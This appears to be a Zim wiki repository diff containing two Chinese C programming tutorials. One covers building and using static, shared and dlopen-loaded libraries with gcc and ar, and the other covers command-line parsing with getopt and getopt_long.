我们的应用程序接口由三个函数构成,第一个函数是initrand(),这是一个初始化函数,它的任务是为使用程序库做好必要的准备,在调用所有其他随机函数之前,必须首先调用这个初始化函数。第二个函数getSRand()的作用是随机返回一个浮点数,其值介于0.0到1.0之间。最后一个函数是getRand(x),它返回一个随机整数,其值介于0到(x-1)之间。
|
||||
|
||||
在文件initrand.c中,放的是初始化函数initrand()的实现代码,这个函数使用当前时间作为种子值来初始化随机数生成程序。代码如下所示:
|
||||
|
||||
01 //initrand.c,初始化函数initrand()的源代码
|
||||
02 #include <stdlib.h>
|
||||
03 #include <time.h>
|
||||
04
|
||||
05 //initRand()用于初始化随机数生成器
|
||||
06
|
||||
07 void initRand()
|
||||
08 {
|
||||
09 time_t seed;
|
||||
10 seed = time(NULL);
|
||||
11 srand( seed );
|
||||
12 return;
|
||||
13 }
|
||||
|
||||
文件randapi.c是我们最后一个实现API的文件,它也提供了一个随机数函数,源代码如下所示:
|
||||
|
||||
01 //randapi.c,随机数函数的API实现
|
||||
02 #include <stdlib.h>
|
||||
03 //getSRand()返回一个介于0.0~1.0之间的浮点数
|
||||
04 float getSRand()
|
||||
05 {
|
||||
06 float randvalue;
|
||||
07
|
||||
08 randvalue = ((float)rand() / (float)RAND_MAX);
|
||||
09
|
||||
10 return randvalue;
|
||||
11 }
|
||||
12
|
||||
13 //getRand()返回一个介于0~(max-1)之间的整数
|
||||
14 int getRand( int max )
|
||||
15 {
|
||||
16 int randvalue;
|
||||
17
|
||||
18 randvalue = (int)((float)max * rand() / (RAND_MAX+1.0));
|
||||
19
|
||||
20 return randvalue;
|
||||
21 }
|
||||
|
||||
这就是我们的API了,注意,initapi.c和randapi.c的函数原型都放在了同一个头文件中,即randapi.h。当然,我们完全可以在单个文件中来实现这些功能,但是为了示范程序库的建立,我们故意将它们放到不同的文件中。
|
||||
|
||||
现在,我们在来看一下使用这些API的测试程序,该程序将**使用我们的程序库提供的应用编程接口进行工作**。这个应用程序通过计算随机数函数返回的的平均值来快速检验API,因为平均值应该在随机数范围的中间附近。该程序的代码如下所示:
|
||||
|
||||
01 //test.c,测试我们的程序库的API的应用程序。
|
||||
02 #include "randapi.h"
|
||||
03 #define ITERATIONS 1000000L
|
||||
04 int main(){
|
||||
05 long i;
|
||||
06 long isum;
|
||||
07 float fsum;
|
||||
08 /*初始化随机数API*/
|
||||
09 initRand();
|
||||
10 /*计算getRand(10)的返回值的平均数*/
|
||||
11 isum = 0L;
|
||||
12 for (i = 0 ; i < ITERATIONS ; i++){
|
||||
13 isum += getRand(10);
|
||||
14 }
|
||||
15 printf( "getRand() Average %d\n", (int)(isum / ITERATIONS) );
|
||||
16 /* 计算getSRand()返回值的平均数*/
|
||||
17 fsum = 0.0;
|
||||
18 for (i = 0 ; i < ITERATIONS ; i++){
|
||||
19 fsum += getSRand();
|
||||
20 }
|
||||
21 printf( "getSRand() Average %f\n", (fsum / (float)ITERATIONS) );
|
||||
22 return;
|
||||
23 }
|
||||
|
||||
通过下列命令,可以编译所有源文件并将其综合成单个映像:
|
||||
|
||||
**1 $ gcc initapi.c randapi.c test.c -o test**
|
||||
|
||||
上述gcc命令将编译三个文件,并把它们连接成单个映像,该映像名为test。运行该映像时,我们将看到各随机数函数的平均值:
|
||||
|
||||
1 $ ./test
|
||||
2
|
||||
3 getRand() Average 4
|
||||
4 getSRand() Average 0.500003
|
||||
5
|
||||
6 $
|
||||
|
||||
我们看到,结果和预期的一样,产生的随机数的平均值正好在随机数范围的中间值附近。然而,我们想要的可不是把所有源代码编译成单个映像,而是建立一个随机数函数库。别急,我们现在就开始使用ar实用程序来达到此目。您可以通过下面的命令,在获得最终的二进制映像的同时,还会生成我们的第一个静态库。
|
||||
|
||||
1 $ gcc -c -Wall initapi.c
|
||||
2 $ gcc -c -Wall randapi.c
|
||||
3 __$ ar -cru libmyrand.a initapi.o randapi.o__
|
||||
4
|
||||
5 $
|
||||
|
||||
这里,我们首先使用gcc编译了两个源文件initapi.c和randapi.c,其中-c选项是告诉gcc仅编译而不链接,并开启所有警告。接下来,我们使用ar命令来生成咱们的程序库libmyrand.a。其中cru选项是创建或者添加存档时的标准设置,**c选项表示要建立静态库**,如果静态库早已存在,则忽略该选项。**选项r的作用是让ar替换静态库中的现有目标**,当然是它们业已存在的话。
|
||||
|
||||
最后,选项u的作用是为保险起见,只有当新生成的目标文件比存档中原有的目标文件要新时才替换同名的目标文件。
|
||||
|
||||
如今,我们已经得到了一个名为libmyrand.a的新文件,它就是我们想要的静态库。该静态库中存有两个目标程序,即initapi.o和randapi.o。那么,我们如何利用这个静态库来构建应用程序呢?别急,继续往下看。方法很简单,如下所示:
|
||||
|
||||
1 $ gcc test.c __-L. -lmyrand__ -o test
|
||||
2
|
||||
3 $ ./test
|
||||
4 getRand() Average 4
|
||||
5 getSRand() Average 0.499892
|
||||
6 $
|
||||
|
||||
这里,我们首先使用gcc来编译test.c,然后利用libmyrand.a连接目标程序test.o,这样就得到了可执行文件。选项-L.的作用是告诉gcc,程序库在当前子目录中。(这里的点号.表示目录)。
|
||||
|
||||
注意,我们也可以为程序库指定具体的子目录,如-L/usr/mylibs。选项-L用来标识要用的程序库。还要留意的是,这里的myrand并不是我们的程序库的名称,我们的程序库的名称是libmyrand.a。使用-L时,系统会替我们在指定的名称的前后分别加上lib和.a,因此,如果我们在此规定-ltest的话,系统将查找名为libtest.a的程序库。
|
||||
|
||||
我们已经了解了创建程序库以及使用它来构建应用程序的方法,现在让我们继续探讨一下ar程序的用法。我们可以通过-t选项来调查静态库中到底包含了哪些内容,如下所示:
|
||||
|
||||
1 __$ ar -t libmyrand.a__
|
||||
2 initapi.o
|
||||
3 randapi.o
|
||||
4 $
|
||||
|
||||
如果需要的话,我们还可以删除静态库中的目标程序,为此需要用到-__d选项__,如下所示:
|
||||
|
||||
1 $ __ar -d libmyrand.a initapi.o__
|
||||
2 $ ar -t libmyrand.a
|
||||
3
|
||||
4 randapi.o
|
||||
5 $
|
||||
|
||||
这里要引起注意的是,使用上述命令ar执行删除任务失败时,它是不会通知我们的,要想查看出错信息,需要添加__-v选项__,如下所示:
|
||||
|
||||
1 $ ar -d libmyrand.a initapi.o
|
||||
2 $ ar -dv libmyrand.a initapi.o
|
||||
3 No member named ‘initapi.o’
|
||||
4 $
|
||||
|
||||
在前一种情况下,如果我们试图删除目标文件initapi.o,尽管该静态库中并没有这个文件,但是却没有产生任何错误消息。在第二种情况下,我们添加v选项后就得到了相应的错误信息。我们不仅可以从静态库删除目标文件,还可以通过-__x选项来从中提取目标文件__,如下所示:
|
||||
|
||||
1 $ __ar -xv libmyrand.a initapi.o__
|
||||
2 x - initapi.o
|
||||
3 $ ls
|
||||
4 initapi.o libmyrand.a
|
||||
5 $ ar -t libmyrand.a
|
||||
6 randapi.o
|
||||
7 initapi.o
|
||||
8 $
|
||||
|
||||
选项-x和-v结合使用后,我们能够得到更多的信息。提供在相应子目录中键入ls命令,我们就能看到实用程序ar提取的文件。这里我们要注意的是,我们同时还列出了提取文件后的静态库的内容,我们发现initapi.o仍然在那里,也就是说,__提取选项实际上并没有删除静态库中的目标文件__,而只是复制了一份而已。要想删除静态库中的目标文件,必须使用删除选项-d。
|
||||
|
||||
===== 三、共享库的创建和使用 =====
|
||||
|
||||
现在,我们开始介绍共享库,为了省劲,我们依然使用前面的测试程序。首先,我们用initapi.o和randapi.o这两个目标文件来建立一个共享库。与静态库相比,在为共享库编译源代码时有些不同之处。
|
||||
|
||||
与使用静态库的情形不同,使用共享库时,程序库并没有放进应用程序的可执行文件中,所以__共享库的代码应该使用相对寻址方式__,比如通过全局偏移表(GOT)寻址。加载共享库时,加载器会自动地解析所有GOT地址。编译源文件时,为了让生成的__目标文件具有位置无关性__,我们需要使用gcc的PIC选项:
|
||||
|
||||
1 $ __gcc -fPIC -c initapi.c__
|
||||
2 $ gcc -fPIC -c randapi.c
|
||||
|
||||
这样得到的两个目标文件的代码就具有位置无关性。我们可以使用带有-shared标志的gcc命令来创建一个共享库,这个标志的作用是告诉gcc要建立的是一个共享库:
|
||||
|
||||
1 $__ gcc -shared initapi.o randapi.o -o libmyrand.so__
|
||||
|
||||
我们利用-o规定两个目标模块作为共享库输出。注意,这里我们使用.so后缀来指出该文件是一个共享库。为了使用新建的共享库,即共享目标文件来创建应用程序,我们需要连接共享库中的所需元素,这一点与静态库是一致的:
|
||||
|
||||
1 $ gcc test.c -L. -lmyrand -o test
|
||||
|
||||
要想知道新的二进制映像依赖于哪些共享库,可以使用ldd命令,该命令会打印出某个应用程序所依赖的共享库。举例来说:
|
||||
|
||||
1 $ __ldd test__
|
||||
2 libmyrand.so => not found
|
||||
3 libc.so.6 => /lib/tls/libc.so.6 (0x42000000)
|
||||
4 /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
|
||||
5 $
|
||||
|
||||
命令ldd能确定出我们的测试程序需要用到哪些共享库。其中__libc.so.6__是标准C库,__ld-linux.so.2__是动态链接器/装载器。注意,这里显示没有发现libmyrand.so,这是因为虽然该文件存在于应用程序的目录中,但是我们必须显式指出。我们可以通过环境变量LD_LIBRARY_PATH来完成此任务。给出我们的共享库的位置之后,再次使用ldd命令:
|
||||
|
||||
1 $ __export LD_LIBRARY_PATH=./__
|
||||
2 $ ldd test
|
||||
3 libmyrand.so => ./libmyrand.so (0x40017000)
|
||||
4 libc.so.6 => /lib/tls/libc.so.6 (0x42000000)
|
||||
5 /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
|
||||
6 $
|
||||
|
||||
我们显式说明了共享库位于当前目录(./)之后,再次运行ldd命令,它现在终于找到所需共享库了。如果我们不这样做就急着执行我们的应用程序的话,将会收到一条错误消息,指出找不到所需的共享库,如下所示:
|
||||
|
||||
1 $ ./test
|
||||
2 ./test: error while loading shared libraries: libmyrand.so:
|
||||
3 cannot find shared object file: No such file or directory.
|
||||
4 $
|
||||
|
||||
===== 四、动态库的创建和使用 =====
|
||||
|
||||
我们最后要介绍的是一种动态加载的共享库,或称为__动态链接库__。它的特点是__在应用程序运行过程中,什么时候需要了才装入内存,而不是像共享库那样当应用程序启动时就把程序库装入内存__。为此,我们还要像前面那样来构建共享的目标文件,如下所示:
|
||||
|
||||
1 $ gcc -fPIC -c initapi.c
|
||||
2 $ gcc -fPIC -c randapi.c
|
||||
3 $ gcc -shared initapi.o randapi.o -o libmyrand.so
|
||||
4 $ su -
|
||||
5 <provide your root password>
|
||||
6 $ cp libmyrand.so /usr/local/lib
|
||||
7 $ exit
|
||||
|
||||
在这里,我们将我们的共享库放到一个公共位置,即/usr/local/lib目录。就像我们所看到的那样,静态库和共享库通常跟应用程序的二进制文件放置在同一目录下,与之不同,动态链接库则一般放在/usr/local/lib目录中。**这个库跟原来的共享库在功能上是等价的,只是应用程序使用它们的方式有所区别**。需要说明的是,为了把我们的程序库复制到/usr/local/lib中,需要root权限。为此,可以首先使用su命令变成root用户。
|
||||
|
||||
现在,我们已经重建了自己的共享库,接下来就是我们的测试程序如何__动态使用__它了。为此,我们必须对测试程序访问API的方式做一些修改。然后,我们再来看一下如何构建使用动态链接库的程序。更新后的测试程序代码如下所示:
|
||||
|
||||
01 //用于动态链接库的测试程序
|
||||
02 #include <stdlib.h>
|
||||
03 #include <stdio.h>
|
||||
04 **#include <dlfcn.h>**
|
||||
05 **#include "randapi.h"**
|
||||
06
|
||||
07 #define ITERATIONS 1000000L
|
||||
08
|
||||
09 int main()
|
||||
10 {
|
||||
11 long i;
|
||||
12 long isum;
|
||||
13 float fsum;
|
||||
14** void *handle;**
|
||||
15 char *err;
|
||||
16
|
||||
17 **void (*initRand_d)(void);**
|
||||
**18 float (*getSRand_d)(void);**
|
||||
**19 int (*getRand_d)(int);**
|
||||
20
|
||||
21 //打开动态库的句柄
|
||||
22 handle = dlopen( "/usr/local/lib/libmyrand.so", RTLD_LAZY );
|
||||
23 if (handle == (void *)0)
|
||||
24 {
|
||||
25 fputs( **dlerror()**, stderr );
|
||||
26 exit(-1);
|
||||
27 }
|
||||
28
|
||||
29 //检查对initRand()函数的访问情况
|
||||
30 **initRand_d = dlsym( handle, "initRand" );**
|
||||
31 err = dlerror();
|
||||
32 if (err != NULL)
|
||||
33 {
|
||||
34 fputs( err, stderr );
|
||||
35 exit(-1);
|
||||
36 }
|
||||
37 //检测对getSRand()函数的访问情况
|
||||
38 **getSRand_d = dlsym( handle, "getSRand" );**
|
||||
39 err = dlerror();
|
||||
40 if (err != NULL)
|
||||
41 {
|
||||
42 fputs( err, stderr );
|
||||
43 exit(-1);
|
||||
44 }
|
||||
45 //检查getRand()函数的访问情况
|
||||
46 **getRand_d = dlsym( handle, "getRand" );**
|
||||
47 err = dlerror();
|
||||
48 if (err != NULL)
|
||||
49 {
|
||||
50 fputs( err, stderr );
|
||||
51 exit(-1);
|
||||
52 }
|
||||
53 //随机数API的初始化
|
||||
54 __(*initRand_d)();__
|
||||
55 //计算getRand(10)返回值的平均数
|
||||
56 isum = 0L;
|
||||
57 for (i = 0 ; i < ITERATIONS ; i++)
|
||||
58 {
|
||||
59 isum += (*getRand_d)(10);
|
||||
60 }
|
||||
61 printf( "getRand() Average %d\n", (int)(isum / ITERATIONS) );
|
||||
62 //计算getSRand()函数返回值的平均数
|
||||
63 fsum = 0.0;
|
||||
64 for (i = 0 ; i < ITERATIONS ; i++)
|
||||
65 {
|
||||
66 fsum += __(*getSRand_d)();__
|
||||
67 }
|
||||
68 printf( "getSRand() Average %f\n", (fsum / (float)ITERATIONS) );
|
||||
69 //关闭动态库的句柄
|
||||
70 dlclose( handle );
|
||||
71 return;
|
||||
72 }
|
||||
|
||||
与之前的代码相比,您可能觉得这里的有些费解,但是只要弄懂了DL API的工作方式,一切问题就迎刃而解了。我们这里的真实意图是,先使用dlopen打开共享目标文件,然后通过dlsym让一个局部函数指针指向共享目标文件中的函数。这使得我们可以之后从应用程序中调用该函数。做完这些后,使用dlclose关闭共享库,清除所有引用,即释放为该接口分配的所有内存。
|
||||
|
||||
为了能够使用这些DL API,我们需要在应用程序中包含头文件dlfcn.h。使用动态库的第一步是用dlopen来打开它,其中代码为:
|
||||
|
||||
==== 1 ====
|
||||
handle = dlopen( "/usr/local/lib/libmyrand.so", RTLD_LAZY );
|
||||
|
||||
我们不仅要规定要使用的程序库(本例为/usr/local/lib/libmyrand.so),除此之外还得规定一个标志。我们这里可能用到的标志有两个,RTLD_LAZY和RTLD_NOW,如果规定RTLD_LAZY,那么就会在将来**用到时才解析引用**;如果规定RTLD_NOW标志的话,就会在**装入程序库时就解析各种引用**。如果函数dlopen返回的是一个opaque句柄,说明程序库已经打开了。需要注意的是,如果出现错误的话,我们可以使用dlerror函数向stdout或者stderr输出错误信息。此外,如果必要的话,我们可以在共享库中创建一个名为___init__的函数,这样通过dlopen打开我们的共享库时,就会调用该函数,以进行初始化。因为dlopen函数总是在返回到调用者之前调用这个_init函数。
|
||||
|
||||
===== 2 =====
|
||||
下面,让我们看看是如何引用库中的函数的,或者说如何通过函数名来调用库函数的。先看一下下面的代码:
|
||||
|
||||
1 initRand_d = dlsym( handle, "initRand" );
|
||||
2 err = dlerror();
|
||||
3 if (err != NULL)
|
||||
4 {
|
||||
5 fputs( err, stderr );
|
||||
6 exit(-1);
|
||||
7 }
|
||||
|
||||
由此代码片断可以看出,该过程是很简单的。API函数dlsym会在我们的共享库中搜索定义的函数,就本例而言要找的是初始化函数initrand。如果找到了,会返回一个void *指针,并将其放进一个局部函数指针变量中,这样就可以调用这个函数来进行实际的初始化工作了。我们自动地检验错误状态,如果返回错误字符串,那么会发出该字符串并退出应用程序。这就是发现我们想要调用的共享库函数的过程。获取initrand函数指针之后,我们又得到getSRand以及getRand的函数指针。
|
||||
|
||||
我们的测试程序基本没变,只是__没有直接调用函数,而是使用指针到函数的接口来间接调用它们__。我们看到,虽然动态载入的接口在灵活性方面有所提高,但是在性能上却稍微有所损失。
|
||||
|
||||
在新测试程序中,最后一步是**关闭程序库**,这是通过API函数dlclose来进行的。如果该API发现没有其他用户再使用该共享库的话,它就会将其卸载。
|
||||
|
||||
与dlopen相似,dlclose也提供了一种机制,共享目标文件可以通过该机制来导出一个完成例程,以便当在调用API函数dlclose的时候该完成例程。开发人员只需为共享库添加一个称为_fini的函数,dlclose将在返回之前调用___fini__函数。
|
||||
|
||||
看到了吧,虽然需要少量的改动,但是应用程序使用动态载入的共享库之后,**不仅带来了更大的灵活性,而且还可以显著的节约内存**(参见前面的图1和图2)。需要注意的是,当应用程序启动时,**并不要求所有的动态函数对它都是可见的。相反,只有在程序运行到需要这些函数的时候,才会加载动态库**,在此之前,程序一直不需要它们。
|
||||
|
||||
动态加载的程序库API非常简单,为完整起见我们在此简单加以介绍:
|
||||
|
||||
1 void *dlopen( const char *filename, int flag );
|
||||
2 const char *dlerror( void );
|
||||
3 void *dlsym( void *handle, char *symbol );
|
||||
4 int dlclose( void *handle );
|
||||
|
||||
五、结束语
|
||||
|
||||
在本文中,我们探讨了各种程序库的创建和使用方法。我们首先介绍了静态库,然后讨论共享库,最后讲解了动态加载的程序库,同时,我们还以源码的形式演示了使用ar命令和gcc创建程序库的方法,并用一个示例程序对它们的使用做出了演示。
|
||||
|
||||
最后要说明的是,**每一个库应当对应于一个特定的问题**。如果某个函数不是专门用来解决给定问题的,我们就应该将其排除在该程序库之外,并考虑将其放入其他的程序库。这一点希望读者要引起注意。
|
||||
449
Zim/Programme/APUE/Linux程序设计——用getopt处理命令行参数.txt
Normal file
@@ -0,0 +1,449 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-03-27T20:51:14+08:00
|
||||
|
||||
====== Linux程序设计——用getopt处理命令行参数 ======
|
||||
Created Sunday 27 March 2011
|
||||
|
||||
Linux程序设计——用getopt处理命令行参数
|
||||
Linux下很多程序甚至那些具有图形用户界面(graphical user interface,GUI)的程序,都能接受和处理命令行选项。对于某些程序,这是与用户进行交互的主要手段。具有可靠的复杂命令行参数处理机制,会使得您的应用程序更好、更有用。getopt()是一个专门设计来减轻命令行处理负担的库函数。
|
||||
1、命令行参数
|
||||
|
||||
命令行程序设计的首要任务是解析命令行参数,GUI派的程序员很少关心这个。这里,对参数采用了一种比较通俗的定义:命令行上除命令名之外的字符串。参数由多项构成,项与项之间用空白符彼此隔开。
|
||||
参数进一步分为选项和操作数。选项用于修改程序的默认行为或为程序提供信息,比较老的约定是以短划线开头。选项后可以跟随一些参数,称为选项参数。剩下的就是操作数了。
|
||||
2、POSIX约定
|
||||
|
||||
POSIX表示可移植操作系统接口: Portable Operating System Interface,电气和电子工程师协会(Institute of Electrical and Electronics Engineers,IEEE)最初开发 POSIX 标准,是为了提高 UNIX 环境下应用程序的可移植性。然而,POSIX 并不局限于 UNIX。许多其它的操作系统,例如 DEC OpenVMS 和 Microsoft Windows NT,都支持 POSIX 标准。
|
||||
下面是POSIX标准中关于程序名、参数的约定:
|
||||
|
||||
程序名不宜少于2个字符且不多于9个字符;
|
||||
程序名应只包含小写字母和阿拉伯数字;
|
||||
选项名应该是单字符活单数字,且以短横‘-‘为前綴;
|
||||
多个不需要选项参数的选项,可以合并。(譬如:foo -a -b -c ---->foo -abc)
|
||||
选项与其参数之间用空白符隔开;
|
||||
选项参数不可选。
|
||||
若选项参数有多值,要将其并为一个字串传进来。譬如:myprog -u "arnold,joe,jane"。这种情况下,需要自己解决这些参数的分离问题。
|
||||
选项应该在操作数出现之前出现。
|
||||
特殊参数‘--'指明所有参数都结束了,其后任何参数都认为是操作数。
|
||||
选项如何排列没有什么关系,但对互相排斥的选项,如果一个选项的操作结果覆盖其他选项的操作结果时,最后一个选项起作用;如果选项重复,则顺序处理。
|
||||
允许操作数的顺序影响程序行为,但需要作文档说明。
|
||||
读写指定文件的程序应该将单个参数'-'作为有意义的标准输入或输出来对待。
|
||||
3、GNU长选项
|
||||
|
||||
GNU鼓励程序员使用--help、--verbose等形式的长选项。这些选项不仅不与POSIX约定冲突,而且容易记忆,另外也提供了在所有GNU工具之间保持一致性的机会。GNU长选项有自己的约定:
|
||||
对于已经遵循POSIX约定的GNU程序,每个短选项都有一个对应的长选项。
|
||||
额外针对GNU的长选项不需要对应的短选项,仅仅推荐要有。
|
||||
长选项可以缩写成保持惟一性的最短的字串。
|
||||
选项参数与长选项之间或通过空白字符活通过一个'='来分隔。
|
||||
选项参数是可选的(只对短选项有效)。
|
||||
长选项允许以一个短横线为前缀。
|
||||
4、基本的命令行处理技术
|
||||
|
||||
C程序通过argc和argv参数访问它的命令行参数。argc是整型数,表示参数的个数(包括命令名)。main()函数的定义方式有两种,区别仅在于argv如何定义:
|
||||
|
||||
int main(int argc, char *argv[])
|
||||
{
|
||||
……
|
||||
} int main(int argc, char **argv)
|
||||
{
|
||||
……
|
||||
}
|
||||
|
||||
当 C 运行时库的程序启动代码调用 main() 时,已经对命令行进行了处理。argc 参数包含参数的计数值,而 argv 包含指向这些参数的指针数组。argv[0]是程序名。
|
||||
|
||||
一个很简单的命令行处理技术的例子是echo程序,它可以将参数输出到标准设备上,用空格符隔开,最后换行。若命令行第一个参数为-n,那么就不会换行。
|
||||
|
||||
清单1:
|
||||
|
||||
#include <stdio.h>
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
int i, nflg;
|
||||
|
||||
nflg = 0;
|
||||
if(argc > 1 && argv[1][0] == '-' && argv[1][1] == 'n'){
|
||||
nflg++;
|
||||
argc--;
|
||||
argv++;
|
||||
}
|
||||
for(i=1; i<argc; i++){
|
||||
fputs(argv[i], stdout);
|
||||
if(i < argc-1)
|
||||
putchar(' ');
|
||||
}
|
||||
if(nflg == 0)
|
||||
putchar('\n');
|
||||
|
||||
return 0;
|
||||
}
|
||||
echo程序中,对于命令行参数的解析是手动实现的。很久以前,Unix支持小组为了简化对于命令行参数的解析,开发了getopt()函数,同时提供了几个外部变量,使得编写遵守POSIX的代码变得更加容易了。
|
||||
|
||||
5、命令行参数解析函数 —— getopt()
|
||||
|
||||
getopt()函数声明如下:
|
||||
|
||||
#include <unistd.h>
|
||||
|
||||
int getopt(int argc, char * const argv[], const char *optstring);
|
||||
|
||||
extern char *optarg;
|
||||
extern int optind, opterr, optopt;
|
||||
该函数的argc和argv参数通常直接从main()的参数直接传递而来。optstring是选项字母组成的字串。如果该字串里的任一字符后面有冒号,那么这个选项就要求有选项参数。
|
||||
|
||||
当给定getopt()命令参数的数量 (argc)、指向这些参数的数组 (argv) 和选项字串 (optstring) 后,getopt() 将返回第一个选项,并设置一些全局变量。使用相同的参数再次调用该函数时,它将返回下一个选项,并设置相应的全局变量。如果不再有可识别的选项,将返回 -1,此任务就完成了。
|
||||
|
||||
getopt() 所设置的全局变量包括:
|
||||
|
||||
char *optarg——当前选项参数字串(如果有)。
|
||||
int optind——argv的当前索引值。当getopt()在while循环中使用时,循环结束后,剩下的字串视为操作数,在argv[optind]至argv[argc-1]中可以找到。
|
||||
int opterr——这个变量非零时,getopt()函数为“无效选项”和“缺少参数选项,并输出其错误信息。
|
||||
int optopt——当发现无效选项字符之时,getopt()函数或返回'?'字符,或返回':'字符,并且optopt包含了所发现的无效选项字符。
|
||||
以下面的程序为例:
|
||||
选项:
|
||||
|
||||
-n —— 显示“我的名字”。
|
||||
-g —— 显示“我女朋友的名字”。
|
||||
-l —— 带参数的选项.
|
||||
清单2:
|
||||
|
||||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
|
||||
int main (int argc, char **argv)
|
||||
{
|
||||
int oc; /*选项字符 */
|
||||
char *b_opt_arg; /*选项参数字串 */
|
||||
|
||||
while((oc = getopt(argc, argv, "ngl:")) != -1)
|
||||
{
|
||||
switch(oc)
|
||||
{
|
||||
case 'n':
|
||||
printf("My name is Lyong.\n");
|
||||
break;
|
||||
case 'g':
|
||||
printf("Her name is Xxiong.\n");
|
||||
break;
|
||||
case 'l':
|
||||
b_opt_arg = optarg;
|
||||
printf("Our love is %s\n", optarg);
|
||||
break;
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
运行结果:
|
||||
|
||||
$ ./opt_parse_demo -n
|
||||
My name is Lyong.
|
||||
$ ./opt_parse_demo -g
|
||||
Her name is Xxiong.
|
||||
$ ./opt_parse_demo -l forever
|
||||
Our love is forever
|
||||
$ ./opt_parse_demo -ngl forever
|
||||
My name is Lyong.
|
||||
Her name is Xxiong.
|
||||
Our love is forever
|
||||
6、改变getopt()对错误命令行参数信息的输出行为
|
||||
|
||||
不正确的调用程序在所难免,这种错误要么是命令行选项无效,要么是缺少选项参数。正常情况下,getopt()会为这两种情况输出自己的出错信息(默认自动输出),并且返回'?'。为了验证此事,可以修改一下上面的清单2中的代码。
|
||||
|
||||
清单3:
|
||||
|
||||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
|
||||
int main (int argc, char **argv)
|
||||
{
|
||||
int oc; /*选项字符 */
|
||||
char *b_opt_arg; /*选项参数字串 */
|
||||
|
||||
while((oc = getopt(argc, argv, "ngl:")) != -1)
|
||||
{
|
||||
switch(oc)
|
||||
{
|
||||
case 'n':
|
||||
printf("My name is Lyong.\n");
|
||||
break;
|
||||
case 'g':
|
||||
printf("Her name is Xxiong.\n");
|
||||
break;
|
||||
case 'l':
|
||||
b_opt_arg = optarg;
|
||||
printf("Our love is %s\n", optarg);
|
||||
break;
|
||||
case '?':
|
||||
printf("arguments error!\n");
|
||||
break;
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
输入一个错误的命令行,结果如下:
|
||||
|
||||
$ ./opt_parse_demo -l
|
||||
./opt_parse_demo: option requires an argument -- l
|
||||
arguments error!
|
||||
如果不希望输出任何错误信息,或更希望输出自定义的错误信息。可以采用以下两种方法来更改getopt()函数的出错信息输出行为:
|
||||
|
||||
在调用getopt()之前,将opterr设置为0,这样就可以在getopt()函数发现错误的时候强制它不输出任何消息。
|
||||
如果optstring参数的第一个字符是冒号,那么getopt()函数就会保持沉默,并根据错误情况返回不同字符,如下:
|
||||
“无效选项” —— getopt()返回'?',并且optopt包含了无效选项字符(这是正常的行为)。
|
||||
“缺少选项参数” —— getopt()返回':',如果optstring的第一个字符不是冒号,那么getopt()返回'?',这会使得这种情况不能与无效选项的情况区分开。
|
||||
清单4:
|
||||
|
||||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
|
||||
int main (int argc, char **argv)
|
||||
{
|
||||
int oc; /*选项字符 */
|
||||
char ec; /*无效的选项字符*/
|
||||
char *b_opt_arg; /*选项参数字串 */
|
||||
|
||||
while((oc = getopt(argc, argv, ":ngl:")) != -1)
|
||||
{
|
||||
switch(oc)
|
||||
{
|
||||
case 'n':
|
||||
printf("My name is Lyong.\n");
|
||||
break;
|
||||
case 'g':
|
||||
printf("Her name is Xxiong.\n");
|
||||
break;
|
||||
case 'l':
|
||||
b_opt_arg = optarg;
|
||||
printf("Our love is %s\n", optarg);
|
||||
break;
|
||||
case '?':
|
||||
ec = (char)optopt;
|
||||
printf("无效的选项字符 \' %c \'!\n", ec);
|
||||
break;
|
||||
case ':':
|
||||
printf("缺少选项参数!\n");
|
||||
break;
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
测试结果:
|
||||
|
||||
$ ./opt_parse_demo -a
|
||||
无效的选项字符 ' a '!
|
||||
$ ./opt_parse_demo -l
|
||||
缺少选项参数!
|
||||
|
||||
7、GNU提供的getopt()函数的特点
|
||||
上面所设计的getopt()函数是UNIX支持小组提供的,其执行时一碰到不以'-'开始的命令行参数就停止寻找选项。而GNU提供的getopt()函数与之不同,它会扫描整个命令行来寻找选项。当调用GNU getopt()函数并处理命令行参数的时候,它重新排列argv中的元素,这样当重排结束时,所有选项都被移动到前面并且那些继续检查argv [optind]至argv[argc-1]中剩余参数的代码仍正常工作,但在任何情况下,碰到特殊参数'--'就结束对选项的扫描。
|
||||
|
||||
可以输入一个乱序的命令行,查看opt_parse_demo的输出:
|
||||
|
||||
$ ./opt_parse_demo -l forever a b c d -g -n
|
||||
Our love is forever
|
||||
Her name is Xxiong.
|
||||
My name is Lyong.
|
||||
|
||||
GNU getopt()第二个特点是可以在optstring中使用特殊的首字符改变getopt()的默认行为:
|
||||
|
||||
optstring[0] = '+',这样就与UNIX支持小组提供的getopt()很相近了。
|
||||
optstring[0] = '-',会在optarg中得到命令行中的每个参数。
|
||||
以上两种情况下,':'可以作为第二个字符使用。
|
||||
|
||||
GNU getopt()第三个特点是optstring中的选项字符后面接两个冒号,就允许该选项有可选的选项参数。在选项参数不存在的情况下,GNU getopt()返回选项字符并将optarg设置为NULL。
|
||||
|
||||
8、GNU长选项命令行解析
|
||||
|
||||
20 世纪 90 年代,UNIX 应用程序开始支持长选项,即一对短横线、一个描述性选项名称,还可以包含一个使用等号连接到选项的参数。
|
||||
|
||||
GNU提供了getopt-long()和getopt-long-only()函数支持长选项的命令行解析,其中,后者的长选项字串是以一个短横线开始的,而非一对短横线。
|
||||
|
||||
getopt_long() 是同时支持长选项和短选项的 getopt() 版本。下面是它们的声明:
|
||||
|
||||
#include <getopt.h>
|
||||
|
||||
int getopt_long(int argc, char * const argv[], const char *optstring, const struct option *longopts, int *longindex);
|
||||
|
||||
int getopt_long_only(int argc, char * const argv[],const char *optstring,const struct option *longopts, int *longindex);
|
||||
|
||||
getopt_long()的前三个参数与上 面的getopt()相同,第4个参数是指向option结构的数组,option结构被称为“长选项表”。longindex参数如果没有设置为 NULL,否则它就指向一个变量,这个变量会被赋值为寻找到的长选项在longopts数组中的索引值,这可以用于错误诊断。
|
||||
|
||||
option结构在getopt.h中的声明如下:
|
||||
|
||||
struct option{
|
||||
const char *name;
|
||||
int has_arg;
|
||||
int *flag;
|
||||
int val;
|
||||
};
|
||||
